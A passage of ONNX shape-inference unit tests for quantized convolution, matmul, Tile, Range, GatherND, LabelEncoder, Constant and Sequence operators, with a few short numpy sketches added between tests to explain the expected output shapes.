[('x', TensorProto.INT8, (30, 4, 8, 8, 8)),
('y', TensorProto.INT8, (50, 4, 3, 3, 3)),
('x_zero_point', TensorProto.UINT8, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('ConvInteger', ['x', 'y', 'x_zero_point', 'y_zero_point'], 'z', strides=[1, 2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.INT32, (30, 50, 6, 3, 2))])
def test_convinteger_pads(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, 7, 6, 4)),
('y', TensorProto.INT8, (50, 4, 3, 3, 3))],
[make_node('ConvInteger', ['x', 'y'], 'z', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.INT32, (30, 50, 6, 6, 6))])
def test_convinteger_group(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT8, (30, 4, 8, 8, 8)),
('y', TensorProto.INT8, (4, 1, 8, 8, 8))],
[make_node('ConvInteger', ['x', 'y'], 'z', group=4)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.INT32, (30, 4, 1, 1, 1))])
def test_convinteger_partial_missing_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, None, 6, 4)),
('y', TensorProto.UINT8, (50, 4, 3, 3, 3)),
('x_zero_point', TensorProto.UINT8, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('ConvInteger', ['x', 'y', 'x_zero_point', 'y_zero_point'], 'z', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.INT32, (30, 50, None, 6, 6))]) # type: ignore
def test_convinteger_partial_missing_weight_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, 7, 6, 4)),
('y', TensorProto.UINT8, (50, 4, None, 3, 3))],
[make_node('ConvInteger', ['x', 'y'], 'z', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.INT32, None)])
def test_qlinearconv(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (3, 4, 5, 6, 7)),
('x_scale', TensorProto.FLOAT, ()),
('x_zero_point', TensorProto.UINT8, ()),
('w', TensorProto.UINT8, (5, 4, 2, 4, 3)),
('w_scale', TensorProto.FLOAT, ()),
('w_zero_point', TensorProto.UINT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('QLinearConv', ['x', 'x_scale', 'x_zero_point', 'w', 'w_scale', 'w_zero_point', 'y_scale', 'y_zero_point'], 'y', pads=[0, 1, 1, 0, 0, 1], dilations=[1, 2, 2], strides=[1, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (3, 5, 4, 1, 3))])
def test_qlinearconv_dilations(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, 8, 8, 8)),
('x_scale', TensorProto.FLOAT, ()),
('x_zero_point', TensorProto.UINT8, ()),
('w', TensorProto.UINT8, (50, 4, 3, 3, 3)),
('w_scale', TensorProto.FLOAT, ()),
('w_zero_point', TensorProto.UINT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('QLinearConv', ['x', 'x_scale', 'x_zero_point', 'w', 'w_scale', 'w_zero_point', 'y_scale', 'y_zero_point'], 'y', dilations=[1, 2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (30, 50, 6, 4, 2))])
def test_qlinearconv_strides(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT8, (30, 4, 8, 8, 8)),
('x_scale', TensorProto.FLOAT, ()),
('x_zero_point', TensorProto.INT8, ()),
('w', TensorProto.INT8, (50, 4, 3, 3, 3)),
('w_scale', TensorProto.FLOAT, ()),
('w_zero_point', TensorProto.INT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.INT8, ())],
[make_node('QLinearConv', ['x', 'x_scale', 'x_zero_point', 'w', 'w_scale', 'w_zero_point', 'y_scale', 'y_zero_point'], 'y', strides=[1, 2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT8, (30, 50, 6, 3, 2))])
def test_qlinearconv_pads(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, 7, 6, 4)),
('x_scale', TensorProto.FLOAT, ()),
('x_zero_point', TensorProto.UINT8, ()),
('w', TensorProto.INT8, (50, 4, 3, 3, 3)),
('w_scale', TensorProto.FLOAT, ()),
('w_zero_point', TensorProto.INT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('QLinearConv', ['x', 'x_scale', 'x_zero_point', 'w', 'w_scale', 'w_zero_point', 'y_scale', 'y_zero_point'], 'y', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (30, 50, 6, 6, 6))])
def test_qlinearconv_group(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT8, (30, 4, 8, 8, 8)),
('x_scale', TensorProto.FLOAT, ()),
('x_zero_point', TensorProto.INT8, ()),
('w', TensorProto.INT8, (4, 1, 8, 8, 8)),
('w_scale', TensorProto.FLOAT, ()),
('w_zero_point', TensorProto.INT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.INT8, ())],
[make_node('QLinearConv', ['x', 'x_scale', 'x_zero_point', 'w', 'w_scale', 'w_zero_point', 'y_scale', 'y_zero_point'], 'y', group=4)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT8, (30, 4, 1, 1, 1))])
def test_qlinearconv_partial_missing_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, None, 6, 4)),
('x_scale', TensorProto.FLOAT, ()),
('x_zero_point', TensorProto.UINT8, ()),
('w', TensorProto.UINT8, (50, 4, 3, 3, 3)),
('w_scale', TensorProto.FLOAT, ()),
('w_zero_point', TensorProto.UINT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('QLinearConv', ['x', 'x_scale', 'x_zero_point', 'w', 'w_scale', 'w_zero_point', 'y_scale', 'y_zero_point'], 'y', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (30, 50, None, 6, 6))]) # type: ignore
def test_qlinearconv_partial_missing_weight_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, 7, 6, 4)),
('x_scale', TensorProto.FLOAT, ()),
('x_zero_point', TensorProto.UINT8, ()),
('w', TensorProto.UINT8, (50, 4, None, 3, 3)),
('w_scale', TensorProto.FLOAT, ()),
('w_zero_point', TensorProto.UINT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('QLinearConv', ['x', 'x_scale', 'x_zero_point', 'w', 'w_scale', 'w_zero_point', 'y_scale', 'y_zero_point'], 'y', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, None)])
def _make_qlinearmatmul_test(self, shape1, shape2): # type: (Sequence[int], Sequence[int]) -> None
expected_out_shape = np.matmul(np.arange(np.prod(shape1)).reshape(shape1),
np.arange(np.prod(shape2)).reshape(shape2)).shape
graph = self._make_graph(
[('a', TensorProto.UINT8, shape1),
('a_scale', TensorProto.FLOAT, ()),
('a_zero_point', TensorProto.UINT8, ()),
('b', TensorProto.UINT8, shape2),
('b_scale', TensorProto.FLOAT, ()),
('b_zero_point', TensorProto.UINT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('QLinearMatMul', ['a', 'a_scale', 'a_zero_point', 'b', 'b_scale', 'b_zero_point', 'y_scale', 'y_zero_point'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, expected_out_shape)])
def test_qlinearmatmul(self): # type: () -> None
self._make_qlinearmatmul_test((3,), (3,))
self._make_qlinearmatmul_test((4, 2), (2, 4))
self._make_qlinearmatmul_test((2,), (2, 3))
self._make_qlinearmatmul_test((4, 2), (2,))
self._make_qlinearmatmul_test((5, 1, 4, 2), (1, 3, 2, 3))
self._make_qlinearmatmul_test((4, 2), (3, 2, 3))
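# QLinearMatMul (and MatMulInteger below) infer their output shape with numpy-
# style matmul broadcasting, which is why `_make_qlinearmatmul_test` can derive
# the expectation straight from np.matmul. A sketch of that derivation:

```python
import numpy as np

def matmul_out_shape(shape_a, shape_b):
    # Run numpy's matmul (same broadcasting rules ONNX uses for the
    # MatMul family) on dummy data and read back the shape.
    a = np.zeros(shape_a, dtype=np.uint8)
    b = np.zeros(shape_b, dtype=np.uint8)
    return np.matmul(a, b).shape

print(matmul_out_shape((4, 2), (2, 4)))              # (4, 4)
print(matmul_out_shape((2,), (2, 3)))                # (3,) -- 1-D lhs is squeezed
print(matmul_out_shape((5, 1, 4, 2), (1, 3, 2, 3)))  # (5, 3, 4, 3) -- batch dims broadcast
```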
def _make_qlinearmatmul_test_allow_unknown(self, shape1, shape2, expected_out_shape): # type: (Any, Any, Any) -> None
graph = self._make_graph(
[('a', TensorProto.UINT8, shape1),
('a_scale', TensorProto.FLOAT, ()),
('a_zero_point', TensorProto.UINT8, ()),
('b', TensorProto.UINT8, shape2),
('b_scale', TensorProto.FLOAT, ()),
('b_zero_point', TensorProto.UINT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('QLinearMatMul', ['a', 'a_scale', 'a_zero_point', 'b', 'b_scale', 'b_zero_point', 'y_scale', 'y_zero_point'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, expected_out_shape)])
def test_qlinearmatmul_allow_unknown(self): # type: () -> None
self._make_qlinearmatmul_test_allow_unknown((None,), (None,), ())
self._make_qlinearmatmul_test_allow_unknown((3,), (None,), ())
self._make_qlinearmatmul_test_allow_unknown((2,), (2, "a"), ("a",))
self._make_qlinearmatmul_test_allow_unknown((4, 2), (2, "a"), (4, "a"))
self._make_qlinearmatmul_test_allow_unknown((4, None), (2, "a"), (4, "a"))
self._make_qlinearmatmul_test_allow_unknown((4, None), (None, "a"), (4, "a"))
self._make_qlinearmatmul_test_allow_unknown((1, 4, 2), ("a", 2, 5), ("a", 4, 5))
self._make_qlinearmatmul_test_allow_unknown((1, 3, 4, 2), ("a", 2, 5), (1, 3, 4, 5))
self._make_qlinearmatmul_test_allow_unknown(None, ("a", 2, 5), None)
self._make_qlinearmatmul_test_allow_unknown(None, None, None)
def _make_matmulinteger_test(self, shape1, shape2): # type: (Sequence[int], Sequence[int]) -> None
expected_out_shape = np.matmul(np.arange(np.prod(shape1)).reshape(shape1),
np.arange(np.prod(shape2)).reshape(shape2)).shape
graph = self._make_graph(
[('A', TensorProto.UINT8, shape1),
('B', TensorProto.UINT8, shape2),
('a_zero_point', TensorProto.UINT8, ()),
('b_zero_point', TensorProto.UINT8, ())],
[make_node('MatMulInteger', ['A', 'B', 'a_zero_point', 'b_zero_point'], ['Y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.INT32, expected_out_shape)])
def test_matmulinteger(self): # type: () -> None
self._make_matmulinteger_test((2,), (2,))
self._make_matmulinteger_test((1, 2), (2, 3))
self._make_matmulinteger_test((2,), (2, 3))
self._make_matmulinteger_test((4, 2), (2,))
self._make_matmulinteger_test((5, 1, 4, 2), (1, 3, 2, 3))
self._make_matmulinteger_test((4, 2), (3, 2, 3))
def test_quantizelinear(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 5)),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('QuantizeLinear', ['x', 'y_scale', 'y_zero_point'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (30, 4, 5))])
def test_dequantizelinear(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, 5)),
('x_scale', TensorProto.FLOAT, ()),
('x_zero_point', TensorProto.UINT8, ())],
[make_node('DequantizeLinear', ['x', 'x_scale', 'x_zero_point'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (30, 4, 5))])
def test_reversesequence(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6)),
('sequence_lens', TensorProto.INT64, (5,))],
[make_node('ReverseSequence', ['x', 'sequence_lens'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (4, 5, 6))])
def test_unique_without_axis(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (2, 4, 2))],
[make_node('Unique', ['X'], ['Y', 'indices', 'inverse_indices', 'counts'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (None,)), # type: ignore
make_tensor_value_info('indices', TensorProto.INT64, (None,)), # type: ignore
make_tensor_value_info('inverse_indices', TensorProto.INT64, (None,)), # type: ignore
make_tensor_value_info('counts', TensorProto.INT64, (None,))]) # type: ignore
def test_unique_with_axis(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (2, 4, 2))],
[make_node('Unique', ['X'], ['Y', 'indices', 'inverse_indices', 'counts'], axis=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (2, None, 2)), # type: ignore
make_tensor_value_info('indices', TensorProto.INT64, (None,)), # type: ignore
make_tensor_value_info('inverse_indices', TensorProto.INT64, (None,)), # type: ignore
make_tensor_value_info('counts', TensorProto.INT64, (None,))]) # type: ignore
def test_det(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (3, 3))],
[make_node('Det', ['X'], ['Y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, ())])
graph = self._make_graph(
[('X', TensorProto.FLOAT, (4, 5, 6, 7, 7))],
[make_node('Det', ['X'], ['Y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (4, 5, 6))])
def test_tile(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6)),
('repeats', TensorProto.INT64, (3,))],
[make_node('Tile', ['x', 'repeats'], ['y'])],
[],
initializer=[make_tensor('repeats', TensorProto.INT64, (3,), (1, 2, 3))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (4, 10, 18))])
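# Tile's inferred shape is simply each input dim multiplied by the matching
# repeat count, which numpy's tile demonstrates directly:

```python
import numpy as np

x = np.zeros((4, 5, 6), dtype=np.float32)
repeats = (1, 2, 3)
y = np.tile(x, repeats)
print(y.shape)  # (4, 10, 18) -- each dim scaled by its repeat
```

# When `repeats` is not a constant (the rank-inference test below), only the
# rank survives, hence the (None, None, None) expectation.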
def test_tile_raw_input_data(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6)),
('repeats', TensorProto.INT64, (3,))],
[make_node('Tile', ['x', 'repeats'], ['y'])],
[],
initializer=[make_tensor('repeats', TensorProto.INT64, (3,),
vals=np.array([1, 2, 3], dtype='<i8').tobytes(), raw=True)]) # Feed raw bytes (little-endian, as the ONNX standard requires) for test purposes
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (4, 10, 18))])
def test_tile_rank_inference(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6)),
('repeats', TensorProto.INT64, (3,))],
[make_node('Tile', ['x', 'repeats'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (None, None, None))]) # type: ignore
def test_linearclassifier_1D_input(self): # type: () -> None
if ONNX_ML:
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5,))],
[make_node('LinearClassifier', ['x'], ['y', 'z'], domain=ONNX_ML_DOMAIN, coefficients=[0.0008, -0.0008], intercepts=[2.0, 2.0], classlabels_ints=[1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (1,)),
make_tensor_value_info('z', TensorProto.FLOAT, (1, 2))],
opset_imports=[make_opsetid(ONNX_ML_DOMAIN, 1), make_opsetid(ONNX_DOMAIN, 11)])
def test_linearclassifier_2D_input(self): # type: () -> None
if ONNX_ML:
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5))],
[make_node('LinearClassifier', ['x'], ['y', 'z'], domain=ONNX_ML_DOMAIN, coefficients=[0.1, 0.2, 0.3, 0.4, 0.5, 0.6], intercepts=[2.0, 2.0, 3.0], classlabels_ints=[1, 2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (4,)),
make_tensor_value_info('z', TensorProto.FLOAT, (4, 3))],
opset_imports=[make_opsetid(ONNX_ML_DOMAIN, 1), make_opsetid(ONNX_DOMAIN, 11)])
def test_roialign_symbolic(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, ('N', 'C', 'H', 'W')),
('rois', TensorProto.FLOAT, ('num_rois', 4)),
('batch_indices', TensorProto.INT64, ('num_rois',))],
[make_node('RoiAlign', ['x', 'rois', 'batch_indices'], ['y'], output_height=10, output_width=5)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, ('num_rois', 'C', 10, 5))]) # type: ignore
def test_roialign_symbolic_defaults(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, ('N', 'C', 'H', 'W')),
('rois', TensorProto.FLOAT, ('num_rois', 4)),
('batch_indices', TensorProto.INT64, ('num_rois',))],
[make_node('RoiAlign', ['x', 'rois', 'batch_indices'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, ('num_rois', 'C', 1, 1))]) # type: ignore
def test_roialign_num_rois(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, ('N', 'C', 'H', 'W')),
('rois', TensorProto.FLOAT, ('num_rois', 4)),
('batch_indices', TensorProto.INT64, (15,))],
[make_node('RoiAlign', ['x', 'rois', 'batch_indices'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (15, 'C', 1, 1))]) # type: ignore
def test_label_encoder_string_int64(self): # type: () -> None
if ONNX_ML:
string_list = ['A', 'm', 'y']
float_list = [94.17, 36.00]
int64_list = [12, 28, 86]
graph = self._make_graph(
[('x', TensorProto.STRING, (6, 1))],
[make_node('LabelEncoder', ['x'], ['y'], domain=ONNX_ML_DOMAIN,
keys_strings=string_list, values_int64s=int64_list)], [])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (6, 1))],
opset_imports=[make_opsetid(ONNX_ML_DOMAIN, 2), make_opsetid(ONNX_DOMAIN, 11)])
graph = self._make_graph(
[('x', TensorProto.INT64, (2, 3))],
[make_node('LabelEncoder', ['x'], ['y'], domain=ONNX_ML_DOMAIN,
keys_int64s=int64_list, values_strings=string_list)], [])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.STRING, (2, 3))],
opset_imports=[make_opsetid(ONNX_ML_DOMAIN, 2), make_opsetid(ONNX_DOMAIN, 11)])
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2,))],
[make_node('LabelEncoder', ['x'], ['y'], domain=ONNX_ML_DOMAIN,
keys_floats=float_list, values_int64s=int64_list)], [])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (2,))],
opset_imports=[make_opsetid(ONNX_ML_DOMAIN, 2), make_opsetid(ONNX_DOMAIN, 11)])
graph = self._make_graph(
[('x', TensorProto.INT64, (8,))],
[make_node('LabelEncoder', ['x'], ['y'], domain=ONNX_ML_DOMAIN,
keys_int64s=int64_list, values_floats=float_list)], [])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (8,))],
opset_imports=[make_opsetid(ONNX_ML_DOMAIN, 2), make_opsetid(ONNX_DOMAIN, 11)])
graph = self._make_graph(
[('x', TensorProto.FLOAT, ())],
[make_node('LabelEncoder', ['x'], ['y'], domain=ONNX_ML_DOMAIN,
keys_floats=float_list, values_strings=string_list)], [])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.STRING, ())],
opset_imports=[make_opsetid(ONNX_ML_DOMAIN, 2), make_opsetid(ONNX_DOMAIN, 11)])
graph = self._make_graph(
[('x', TensorProto.STRING, (1, 2))],
[make_node('LabelEncoder', ['x'], ['y'], domain=ONNX_ML_DOMAIN,
keys_strings=string_list, values_floats=float_list)], [])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 2))],
opset_imports=[make_opsetid(ONNX_ML_DOMAIN, 2), make_opsetid(ONNX_DOMAIN, 11)])
def make_sparse(self,
shape, # type: Sequence[int]
values, # type: Sequence[int]
indices_shape, # type: Sequence[int]
indices # type: Sequence[int]
): # type: (...) -> SparseTensorProto
sparse = SparseTensorProto()
sparse.dims.extend(shape)
nnz = len(values)
sparse.values.CopyFrom(helper.make_tensor('spval', TensorProto.INT64, (nnz,), values))
sparse.indices.CopyFrom(helper.make_tensor('spind', TensorProto.INT64, indices_shape, indices))
return sparse
def test_constant_sparse(self): # type: () -> None
y_shape = [100]
y_value = self.make_sparse(y_shape, [13, 17, 19], [3], [9, 27, 81])
graph = self._make_graph(
[],
[make_node('Constant', [], ['y'], sparse_value=y_value)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, y_shape)]) # type: ignore
def test_constant_value_int(self): # type: () -> None
graph = self._make_graph(
[],
[make_node('Constant', [], ['y'], value_int=42)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, [])])
def test_constant_value_ints(self): # type: () -> None
value_ints = [1, 2, 3]
graph = self._make_graph(
[],
[make_node('Constant', [], ['y'], value_ints=value_ints)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, [len(value_ints)])])
def test_constant_value_float(self): # type: () -> None
graph = self._make_graph(
[],
[make_node('Constant', [], ['y'], value_float=1.42)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, [])])
def test_constant_value_floats(self): # type: () -> None
value_floats = [1.0, 1.1, 1.2]
graph = self._make_graph(
[],
[make_node('Constant', [], ['y'], value_floats=value_floats)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, [len(value_floats)])])
def test_constant_value_string(self): # type: () -> None
graph = self._make_graph(
[],
[make_node('Constant', [], ['y'], value_string="String value")],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.STRING, [])])
def test_constant_value_strings(self): # type: () -> None
value_strings = ["o", "n", "n", "x"]
graph = self._make_graph(
[],
[make_node('Constant', [], ['y'], value_strings=value_strings)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.STRING, [len(value_strings)])])
def test_range(self): # type: () -> None
graph = self._make_graph(
[('start', TensorProto.FLOAT, ()),
('limit', TensorProto.FLOAT, ()),
('delta', TensorProto.FLOAT, ())],
[make_node('Range', ['start', 'limit', 'delta'], ['output'])],
[],
initializer=[make_tensor('start', TensorProto.FLOAT, (), (1,)),
make_tensor('limit', TensorProto.FLOAT, (), (5,)),
make_tensor('delta', TensorProto.FLOAT, (), (2,))])
self._assert_inferred(graph, [make_tensor_value_info('output', TensorProto.FLOAT, (2,))])
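# With all three inputs constant, Range's output length is
# max(ceil((limit - start) / delta), 0). A sketch of that count for the
# initializers above (helper name is illustrative):

```python
import math

def range_size(start, limit, delta):
    # Element count inferred for Range when start/limit/delta are constant.
    return max(int(math.ceil((limit - start) / delta)), 0)

print(range_size(1.0, 5.0, 2.0))  # 2 -> the values would be [1.0, 3.0]
```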
def test_range_rank_inference(self): # type: () -> None
graph = self._make_graph(
[('start', TensorProto.INT32, ()),
('limit', TensorProto.INT32, ()),
('delta', TensorProto.INT32, ())],
[make_node('Range', ['start', 'limit', 'delta'], ['output'])],
[],
initializer=[make_tensor('start', TensorProto.INT32, (), (1,)),
make_tensor('limit', TensorProto.INT32, (), (5,))]) # Missing 'delta' initializer
self._assert_inferred(graph, [make_tensor_value_info('output', TensorProto.INT32, (None,))]) # type: ignore
def test_gathernd(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6)),
('indices', TensorProto.INT64, (2,))],
[make_node('GatherND', ['x', 'indices'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (6,))])
def test_gathernd_batchdim_1(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 2, 2)),
('indices', TensorProto.INT64, (2, 1))],
[make_node('GatherND', ['x', 'indices'], ['y'], batch_dims=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 2))])
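# The GatherND expectations come from the rule that the last indices dim
# addresses that many leading (post-batch) data dims; the rest pass through.
# A shape-only sketch, assuming static shapes (helper name is illustrative):

```python
def gathernd_out_shape(data_shape, indices_shape, batch_dims=0):
    # indices' outer dims, then whatever trailing data dims the last
    # index dimension does not address.
    last = indices_shape[-1]
    return tuple(indices_shape[:-1]) + tuple(data_shape[batch_dims + last:])

print(gathernd_out_shape((4, 5, 6), (2,)))                  # (6,)
print(gathernd_out_shape((2, 2, 2), (2, 1), batch_dims=1))  # (2, 2)
```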
def test_cumsum(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 3)),
('axis', TensorProto.FLOAT, (1,))],
[make_node('CumSum', ['x', 'axis'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (2, 3))])
def test_nonmaxsuppression(self): # type: () -> None
graph = self._make_graph(
[('boxes', TensorProto.FLOAT, (1, 3, 4)),
('scores', TensorProto.FLOAT, (1, 5, 3))],
[make_node('NonMaxSuppression', ['boxes', 'scores'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (None, 3))]) # type: ignore
def test_sequence_empty(self): # type: () -> None
graph = self._make_graph(
[],
[make_node('SequenceEmpty', [], ['output'])],
[])
self._assert_inferred(graph, [make_sequence_value_info('output', TensorProto.FLOAT, None)]) # type: ignore
def test_sequence_construct(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 4)),
('input3', TensorProto.FLOAT, (2, 3, 4))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['output_sequence'])],
[])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, 3, 4))]) # type: ignore
def test_sequence_construct_one_input(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4))],
[make_node('SequenceConstruct', ['input1'], ['output_sequence'])],
[])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, 3, 4))]) # type: ignore
def test_sequence_construct_diff_rank(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3)),
('input3', TensorProto.FLOAT, (2, 3))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['output_sequence'])],
[])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, None)]) # type: ignore
def test_sequence_construct_diff_dim_size(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 5)),
('input3', TensorProto.FLOAT, (2, 3, 6))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['output_sequence'])],
[])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, 3, None))]) # type: ignore
def test_sequence_insert(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 4)),
('input3', TensorProto.FLOAT, (2, 3, 4)),
('input4', TensorProto.FLOAT, (2, 3, 4))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceInsert', ['in_sequence', 'input4'], ['output_sequence'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, 4)),
make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, 3, 4))]) # type: ignore
def test_sequence_insert_diff_rank(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 4)),
('input3', TensorProto.FLOAT, (2, 3, 4)),
('input4', TensorProto.FLOAT, (2, 3))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceInsert', ['in_sequence', 'input4'], ['output_sequence'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, 4)),
make_sequence_value_info('output_sequence', TensorProto.FLOAT, None)]) # type: ignore
def test_sequence_insert_diff_shape(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 4)),
